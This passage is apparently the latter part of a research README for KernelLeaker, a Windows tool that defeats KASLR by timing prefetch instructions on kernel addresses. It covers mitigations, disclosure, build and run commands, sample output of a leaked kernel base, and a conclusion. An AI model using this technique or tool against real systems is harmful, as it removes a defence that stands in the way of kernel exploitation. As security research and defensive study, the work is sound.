Prefetch Instruction Filtering: The CPU could refuse to execute prefetch instructions on unmapped addresses, always treating them as NOPs without MMU consultation. However, this would eliminate the performance benefit of prefetching in legitimate use cases.
Constant-Time MMU Operations: Design the MMU to perform page table walks in constant time regardless of whether the address is mapped. This is challenging because early-exit optimizations are critical for MMU performance.
Noise Injection: Intentionally add random delays to MMU operations to obscure timing differences. This degrades overall system performance for marginal security benefit.
None of these mitigations are currently implemented in mainstream CPUs or operating systems.
10.2 The Exploit Chain Requirement
It is critical to emphasize that leaking the kernel base address alone does not constitute a complete exploit. KASLR bypass is a single step in a larger attack chain that typically requires:
- Initial vulnerability (buffer overflow, use-after-free, etc.)
- KASLR bypass (this technique)
- ROP chain construction or code injection
- Privilege escalation
- Payload execution
Each step faces additional mitigations (DEP, CFG, SMEP, SMAP, etc.). Defeating modern OS security requires bypassing multiple layers of defense.
However, KASLR bypass remains valuable to attackers because it eliminates randomization uncertainty. Many vulnerabilities are only exploitable with knowledge of kernel addresses. This research demonstrates that KASLR provides less protection than commonly assumed.
10.3 Responsible Disclosure
The techniques described here exploit documented CPU behavior rather than undisclosed vulnerabilities. Intel and AMD are aware that timing side-channels exist in their microarchitectures - this is an inherent consequence of performance-optimizing designs.
No vendor-specific vulnerabilities were discovered during this research. The implementation uses only publicly documented instructions (prefetch, rdtscp) and standard timing analysis techniques.
The code is released for educational and research purposes. Security researchers can use it to assess the effectiveness of KASLR in their environments. Defensive teams can use it to validate detection mechanisms for side-channel attacks.
11. Future Research Directions
11.1 Cross-Architecture Validation
The most critical next step is validation across diverse CPU architectures:
- Intel 10th, 11th, 12th, 13th, 14th generation (Comet Lake through Meteor Lake)
- AMD Zen 3, Zen 4, Zen 5 (Ryzen 5000/7000/9000 series)
- ARM64 (Qualcomm Snapdragon, Apple M-series under Windows on ARM)
Each architecture may exhibit unique timing characteristics requiring specialized implementations.
11.2 Hypervisor and Cloud Environments
Modern cloud computing relies heavily on virtualization. The interaction between cache timing attacks and hypervisor virtualization remains understudied:
- Do hypervisor TLB flushes on VM context switches eliminate timing signatures?
- Does hardware-assisted virtualization (Intel VT-x, AMD-V) introduce detectable timing artifacts?
- Can timing side-channels leak information across VM boundaries?
These questions have significant implications for cloud security.
11.3 Detection and Monitoring
Defensive research should focus on detecting side-channel attacks in progress:
- Can anomalous patterns of prefetch instructions be detected through performance counters?
- Do cache timing attacks create detectable CPU utilization signatures?
- Can machine learning models classify normal vs. attack timing behavior?
Performance monitoring units (PMUs) in modern CPUs provide rich telemetry that could potentially flag side-channel exploitation.
11.4 Microarchitectural Countermeasures
CPU vendors should investigate microarchitectural defenses:
- Randomized cache replacement policies
- Obfuscated MMU timing behavior
- Prefetch rate limiting for cross-privilege-boundary addresses
- Hardware-enforced constant-time page table walks
These defenses would impose performance costs but could eliminate entire classes of timing attacks.
Building and Usage
Prerequisites
- Operating System: Windows 10/11 (x64)
- Compiler: Visual Studio 2022 with C++20 support
- Build Tools: MASM (Microsoft Macro Assembler) for x64
Building
-
Clone the repository:
git clone https://github.com/wesmar/KernelLeaker.git cd KernelLeaker -
Open
KernelLeaker.slnin Visual Studio 2022 -
Build the solution:
- Select Release | x64 configuration
- Build ? Build Solution (Ctrl+Shift+B)
-
The compiled executable will be located in:
bin\x64\Release\KernelLeaker.exe
Usage
Run the tool with administrator privileges for best results (though not strictly required):
KernelLeaker.exe
This will attempt to leak the kernel base address and display the result.
Print timing measurements:
KernelLeaker.exe --print-timings
or
KernelLeaker.exe -pt
This displays raw timing data for all probed addresses, useful for debugging and analysis. Note that the --print-timings option shows the address with absolute minimum timing, but this is NOT the actual kernel base. The kernel base is typically 1MB (0x100000) before this minimum timing address, which is why the main leak function applies this correction automatically.
Example Output
Standard leak output:
Processor: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
Absolute minimum: 60 cycles at 0xfffff806b4500000 (index: 27461)
Nearby addresses for verification:
0xfffff806b4000000: 118 cycles
0xfffff806b4100000: 111 cycles
0xfffff806b4200000: 111 cycles
0xfffff806b4300000: 111 cycles
0xfffff806b4400000: 66 cycles
0xfffff806b4500000: 60 cycles [MINIMUM]
0xfffff806b4600000: 75 cycles
0xfffff806b4700000: 60 cycles
0xfffff806b4800000: 77 cycles
0xfffff806b4900000: 60 cycles
0xfffff806b4a00000: 76 cycles
0xfffff806b4b00000: 60 cycles
0xfffff806b4c00000: 89 cycles
0xfffff806b4d00000: 60 cycles
0xfffff806b4e00000: 76 cycles
Corrected kernel base: 0xfffff806b4400000 (original minimum: 0xfffff806b4500000)
Attempt 1/7: 0xfffff806b4400000 (votes: 1)
Attempt 2/7: 0xfffff806b4400000 (votes: 2)
Attempt 3/7: 0xfffff806b4400000 (votes: 3)
Attempt 4/7: 0xfffff806b4400000 (votes: 4)
Consensus reached: 0xfffff806b4400000 with 4/4 votes
Kernel base: 0xfffff806b4400000
Timing dump output (--print-timings):
fffff806b4000000 118
fffff806b4100000 111
fffff806b4200000 111
fffff806b4300000 111
fffff806b4400000 66
fffff806b4500000 60
fffff806b4600000 75
fffff806b4700000 60
...
fffff807fff00000 112
avg: 112
min: 60 at 0xfffff806b4500000
The timing dump shows the raw minimum address without the 1MB correction. To get the actual kernel base from timing dump output, subtract 0x100000 from the reported minimum address.
Disclaimer
Educational and Research Purposes Only
This software is provided for educational and security research purposes only. The techniques demonstrated exploit documented CPU behavior and do not constitute exploitation of undisclosed vulnerabilities.
No Warranty
This software is provided "as is" without warranty of any kind, express or implied. The author makes no guarantees regarding:
- Accuracy of leaked addresses
- Reliability across different hardware configurations
- Compatibility with future OS or CPU updates
- Suitability for any particular purpose
Responsible Use
Users are responsible for ensuring their use of this software complies with applicable laws and regulations. Unauthorized access to computer systems is illegal in most jurisdictions.
Hardware Limitations
The implementation was tested exclusively on Intel i7-9750H. AMD-specific code is theoretical and unvalidated. Results on other CPU models may vary significantly.
Not for Malicious Use
This tool is intended to help security researchers understand microarchitectural vulnerabilities and assess KASLR effectiveness. It should not be used for malicious purposes or unauthorized system access.
Contributing
Contributions are welcome, especially:
- AMD Hardware Validation: Testing and tuning on AMD Ryzen processors
- Intel 12th+ Gen Testing: Validation on Alder Lake and newer architectures
- ARM64 Support: Implementation for Windows on ARM
- Detection Mechanisms: Defensive techniques to identify side-channel attacks
- Performance Optimizations: Improvements to measurement speed or accuracy
Please submit pull requests with detailed descriptions of changes and test results.
License
This project is released under the MIT License. See LICENSE file for details.
Acknowledgments
This research builds upon decades of academic work in microarchitectural security. Special thanks to the broader security research community whose published work provided the theoretical foundation.
Contact
Marek Wesolowski
Low-Level Systems Programmer | Assembly, C, C++
Research interests: Microarchitecture, OS Security, Side-Channel Analysis
Website: https://kvc.pl
Conclusion
This research demonstrates that KASLR on Windows x64 systems can be reliably defeated through cache timing side-channel attacks using only userspace code and documented CPU instructions. The technique achieves 100% success rate on Intel i7-9750H hardware through careful statistical analysis, microarchitectural understanding, and vendor-specific adaptation.
The fundamental vulnerability lies in the CPU's microarchitecture: prefetch instructions create measurable timing differences between mapped and unmapped kernel addresses. These differences, though small (30-80 CPU cycles), can be statistically isolated through repeated measurement, noise filtering, and consensus voting.
The implementation demonstrates several technical innovations:
- O(N) mode calculation replacing O(N�) nested loops
- Bimodal distribution separation for AMD processors
- Majority voting mechanism achieving 96%+ reliability from 80% per-attempt accuracy
- Vendor-specific timing signature adaptation (Intel vs AMD)
- Simplified minimum-finding approach for Intel processors
However, significant limitations remain. The technique was validated only on a single Intel CPU model. AMD-specific implementations remain theoretical without hardware validation. Newer CPU generations may prove more vulnerable, equally vulnerable, or more resistant - empirical data does not yet exist.
From a security perspective, this work reinforces that KASLR should not be considered a strong defense in isolation. It provides probabilistic protection against exploitation but can be deterministically bypassed through side-channel analysis. Defense-in-depth remains essential: KASLR must be combined with CFG, SMEP, SMAP, and other mitigations to provide meaningful security.
Microarchitectural side-channels represent a fundamental tension between performance and security. Modern CPUs achieve high performance through speculation, caching, and prefetching - the very mechanisms that create exploitable timing channels. As CPU designs evolve, this tension will only intensify.
The question is not whether side-channels exist - they are inevitable consequences of performance optimization. The question is how to build secure systems despite their existence. This research provides data for that discussion.
Last updated: November 2025# KernelLeaker